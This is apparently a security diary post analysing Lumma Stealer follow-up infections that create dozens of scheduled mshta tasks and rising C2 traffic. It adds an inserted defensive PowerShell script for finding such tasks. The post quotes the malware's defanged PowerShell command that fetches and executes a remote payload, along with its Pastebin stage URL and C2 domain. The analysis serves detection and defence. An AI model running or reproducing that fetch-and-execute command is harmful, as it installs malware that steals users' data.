Infection repeatedly adds scheduled tasks and increases traffic to the same C2 domain

    Published: 2026-01-14. Last Updated: 2026-01-14 18:17:20 UTC
    by Brad Duncan (Version: 1)

    Introduction

    In recent weeks, Lumma Stealer infections have followed a specific pattern in follow-up activity. This pattern adds scheduled tasks for the same action, which increases traffic to the same C2 domain. This diary documents an example from one of these infections on January 14, 2026.

    Details

    After Lumma Stealer performs its data exfiltration, the infected Windows host retrieves information from a Pastebin link, which the infected host uses for a follow-up infection. So far, this follow-up infection has used .cc domains for its C2 traffic. Here is one such example from the beginning of January 2026.

    The image below shows an example of a Lumma Stealer infection from today.


    Shown above: Traffic from a Lumma Stealer infection today filtered in Wireshark.

    The follow-up infection from Lumma Stealer activity begins with a Pastebin URL, hxxps[:]//pastebin[.]com/raw/xRmmdinT, which was still in use as recently as today, January 14, 2026.


    Shown above: Pastebin URL used for the follow-up infection shown in a web browser.

    The Pastebin URL returns the following PowerShell command:

    irm hxxps[:]//fileless-market[.]cc/Notes.pdf | iex

    This leads to several follow-up HTTPS requests for hxxps[:]//fileless-market[.]cc/ as time progresses. These HTTPS requests are generated by mshta commands for hxxps[:]//fileless-market[.]cc/, and each of these commands in turn creates a scheduled task that runs the same mshta command.

    This activity appears to build on itself. Almost 11 hours after an initial infection, the infected Windows host in my lab had 31 scheduled tasks with different names, but they all had the same trigger and action: running the mshta command for hxxps[:]//fileless-market[.]cc/.
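    The pattern above (many differently named tasks sharing one mshta action) can be checked for on a suspect host. The script below is an added example for this diary, not something from the infection or the ISC; it enumerates scheduled tasks with Get-ScheduledTask, flags actions that run mshta with a URL, and groups tasks by identical command line. The $DuplicateThreshold value is an assumed starting point, and the script should be run in an elevated PowerShell session on the host being examined.

```powershell
# Added hunting script (not from the diary): list scheduled tasks whose action runs
# mshta with a URL, and report groups of tasks that share one identical action.
# Assumes an elevated PowerShell session on the Windows host being examined.

# Assumed threshold; the diary's infected host had 31 tasks with the same action.
$DuplicateThreshold = 3

# Only tasks that define at least one action are of interest here.
$tasks = Get-ScheduledTask | Where-Object { $_.Actions }

$rows = foreach ($t in $tasks) {
    foreach ($a in $t.Actions) {
        # Exec actions carry Execute/Arguments; COM handler actions do not, so skip those.
        if (-not $a.Execute) { continue }
        $cmd = ("{0} {1}" -f $a.Execute, $a.Arguments).Trim()
        [pscustomobject]@{
            TaskPath = $t.TaskPath
            TaskName = $t.TaskName
            State    = $t.State
            Command  = $cmd
            # mshta launching a remote URL is the action the diary describes.
            MshtaUrl = ($a.Execute -match '(^|\\)mshta(\.exe)?$') -and
                       ($a.Arguments -match 'https?://')
        }
    }
}

# 1) Any task running mshta against a URL deserves a look on its own.
"Tasks whose action runs mshta with a URL:"
$rows | Where-Object { $_.MshtaUrl } |
    Format-Table TaskPath, TaskName, State, Command -AutoSize

# 2) Many differently named tasks sharing one command line is the
#    "activity builds on itself" pattern seen in this infection.
"Actions shared by $DuplicateThreshold or more tasks:"
$rows | Group-Object Command |
    Where-Object { $_.Count -ge $DuplicateThreshold } |
    Sort-Object Count -Descending |
    ForEach-Object {
        "{0} tasks share the action: {1}" -f $_.Count, $_.Name
        $_.Group | ForEach-Object { "    {0}{1}" -f $_.TaskPath, $_.TaskName }
    }
```

Review any task listed under either check against the task's trigger and creation time before acting on it; legitimate software can also register several tasks with similar actions.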


    Shown above: Task scheduler for the infected Windows host showing multiple tasks generated by this infection after several hours.

    This generated more C2 traffic to fileless-market[.]cc as the hours passed. On January 14, 2026 at 16:02 UTC, I saw 33 TCP streams for HTTPS sessions to this C2 server.


    Shown above: 33 TCP streams for HTTPS sessions to fileless-market[.]cc from this infection.

    Final Words

    This C2 activity seems a bit unusual. I've never seen it before. I chatted about this with some of the other handlers, and they did not remember seeing this type of increase in scheduled tasks and post-infection traffic. If anyone else has noticed activity like this, please leave a comment!

    Bradley Duncan
    brad [at] malware-traffic-analysis.net

    Keywords: Lumma Lumma Stealer